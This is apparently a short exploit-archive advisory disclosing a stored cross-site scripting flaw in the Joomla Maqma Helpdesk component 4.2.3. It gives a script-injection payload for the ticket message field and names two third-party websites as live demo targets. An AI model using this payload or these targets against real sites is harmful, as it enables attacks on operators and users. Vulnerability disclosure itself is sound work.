Joomla Maqma Helpdesk component version 4.2.3 suffers from a cross site scripting vulnerability.
037463b72588a0f7112f5fedf275a5b38c414ee601d80605952e49f95fd72490
######################
# Exploit Title : Joomla com_maqmahelpdesk - XSS Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/maqma-helpdesk
# Category: [ Webapps ]
# Tested on: [ Win ]
# Date: 2016/06/09
# Version : 4.2.3
######################
#
# PoC:
# Add Your Tiket sometimes you must login First
# in Message Text Box Put Payload
# Payload = aaa"><script>alert("XSS")</script>
# Demo :
# https://www.cs-networks.net/index.php/component/maqmahelpdesk/department/support-services?Itemid=1
# http://www.kasercorp.com/index.php?option=com_maqmahelpdesk&Itemid=0&id_workgroup=3&task=workgroup_view
# Youtube : https://www.youtube.com/watch?v=S2yXbEeg-Mk
######################
# Discovered by : Mojtaba MobhaM & T3NZOG4N & FireKernel
# Greetz : Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################